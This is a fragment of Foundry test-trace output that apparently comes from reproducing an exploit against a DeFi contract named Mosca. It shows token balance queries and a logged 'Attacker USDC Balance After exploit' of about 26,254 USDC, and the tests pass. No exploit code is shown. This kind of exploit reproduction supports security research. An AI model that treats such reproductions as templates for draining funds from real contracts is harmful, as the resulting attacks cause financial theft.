    ├─ [1828] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::symbol() [staticcall]
    │   ├─ [1082] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::symbol() [delegatecall]
    │   │   └─ ← [Return] "USDC"
    │   └─ ← [Return] "USDC"
    ├─ [1296] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::balanceOf(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [553] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::balanceOf(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 26254200000000000000000 [2.625e22]
    │   └─ ← [Return] 26254200000000000000000 [2.625e22]
    ├─ [1076] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::decimals() [staticcall]
    │   ├─ [336] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::decimals() [delegatecall]
    │   │   └─ ← [Return] 18
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker USDC Balance After exploit", val: 26254200000000000000000 [2.625e22], decimals: 18)
    ├─  storage changes:
    │   @ 1: 0x0000000000000000000001010000000000000000000000000000000000000000 → 0x0000000000000000000000010000000000000000000000000000000000000000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 15.68s (13.67s CPU time)

Ran 2 test suites in 16.66s (16.90s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
